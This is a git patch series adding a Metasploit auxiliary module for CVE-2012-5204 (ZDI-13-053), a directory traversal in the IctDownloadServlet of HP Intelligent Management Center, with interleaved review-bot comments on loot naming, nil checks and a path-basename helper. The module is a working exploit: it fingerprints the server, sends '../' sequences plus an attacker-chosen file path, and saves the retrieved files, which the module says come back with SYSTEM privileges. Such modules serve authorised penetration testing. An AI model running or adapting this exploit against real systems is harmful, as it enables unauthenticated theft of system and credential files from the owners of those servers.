From 0b4eab2499da42c3a1296d652050aa48b30382e2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 3 Apr 2013 00:24:11 +0200
Subject: [PATCH 1/3] added module for ZDI-13-053
---
.../hp_imc_ictdownloadservlet_traversal.rb | 100 ++++++++++++++++++
1 file changed, 100 insertions(+)
create mode 100644 modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
new file mode 100644
index 0000000000..7249f7533b
--- /dev/null
+++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
@@ -0,0 +1,100 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Intelligent Management IctDownloadServlet Directory Traversal',
+ 'Description' => %q{
+ This module exploits a lack of authentication and a directory traversal in HP
+ Intelligent Management, specifically in the IctDownloadServlet, in order to
+ retrieve arbitrary files with SYSTEM privileges. This module has been tested
+ successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability Discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-5204' ],
+ [ 'OSVDB', '91029' ],
+ [ 'BID', '58676' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-053/' ]
+ ]
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+ OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+ # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
+ OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7])
+ ], self.class)
+ end
+
+ def is_imc?
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"),
+ 'method' => 'GET'
+ })
+
+ if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+ return true
+ else
+ return false
+ end
+ end
+
+ def run_host(ip)
+
+ if not is_imc?
+ vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+ return
+ end
+
+ travs = ""
+ travs << "../" * datastore['DEPTH']
+ travs << datastore['FILEPATH']
+
+ vprint_status("#{rhost}:#{rport} - Sending request...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"),
+ 'method' => 'GET',
+ 'vars_get' =>
+ {
+ 'fileName' => travs
+ }
+ })
+
+ if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
+ contents = res.body
+ fname = File.basename(datastore['FILEPATH'])
+ path = store_loot(
+ 'hp.imc.faultdownloadservlet',
+ 'application/octet-stream',
+ ip,
+ contents,
+ fname
+ )
+ print_good("#{rhost}:#{rport} - File saved in: #{path}")
+ else
+ vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+ return
+ end
+ end
+end
From 85d9e3e9eeddfd9cfe5d7c0b7e9cb0fe17892dea Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 3 Apr 2013 00:29:38 +0200
Subject: [PATCH 2/3] delete space
---
.../scanner/http/hp_imc_ictdownloadservlet_traversal.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
index 7249f7533b..4f03de5176 100644
--- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
 This module exploits a lack of authentication and a directory traversal in HP
 Intelligent Management, specifically in the IctDownloadServlet, in order to
 retrieve arbitrary files with SYSTEM privileges. This module has been tested
- successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+ successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
 },
 'License' => MSF_LICENSE,
 'Author' =>
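Review bot: The loot type handed to store_loot near the end of run_host, `'hp.imc.faultdownloadservlet'`, names a different servlet than the one this module targets and looks carried over from a sibling module; it should read `'hp.imc.ictdownloadservlet',` so saved files are attributed to the right finding. The success test `if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"` first guards the header against nil and then compares it, which is redundant because a nil header simply fails the equality; `if res && res.code == 200 && res.headers['Content-Type'] == "application/doc"` says the same thing. In is_imc? the if/else that returns true/false can be replaced by the condition itself as the method's last expression, and `if not is_imc?` is more idiomatically `unless is_imc?`.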
From b6edad1f1ddd97e1241815c5c4537aa703fea8d7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 5 Apr 2013 11:04:43 +0200
Subject: [PATCH 3/3] fix DEPTH description and basename
---
.../scanner/http/hp_imc_ictdownloadservlet_traversal.rb | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
index 4f03de5176..1e308b45d4 100644
--- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
 OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
 # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
- OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7])
+ OptInt.new('DEPTH', [true, 'Traversal depth', 7])
 ], self.class)
 end
 
@@ -60,6 +60,10 @@ class Metasploit3 < Msf::Auxiliary
 end
 end
 
+ def my_basename(filename)
+ return ::File.basename(filename.gsub(/\\/, "/"))
+ end
+
 def run_host(ip)
 
 if not is_imc?
@@ -83,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary
 
 if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
 contents = res.body
- fname = File.basename(datastore['FILEPATH'])
+ fname = my_basename(datastore['FILEPATH'])
 path = store_loot(
 'hp.imc.faultdownloadservlet',
 'application/octet-stream',
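Review bot: The new `my_basename` helper in the second hunk carries no comment explaining why it exists, and the reason is not obvious from `::File.basename(filename.gsub(/\\/, "/"))`: on a non-Windows host File.basename only splits on '/', so a FILEPATH written with backslashes would otherwise yield the whole path as the loot file name. A one-line comment above the def, `# File.basename only treats '/' as a separator here; normalise Windows-style paths first`, would make the intent clear to the next reader. The explicit `return` is unnecessary in Ruby, and a single-character swap can use `tr` instead of a regex substitution: `::File.basename(filename.tr('\\', '/'))`.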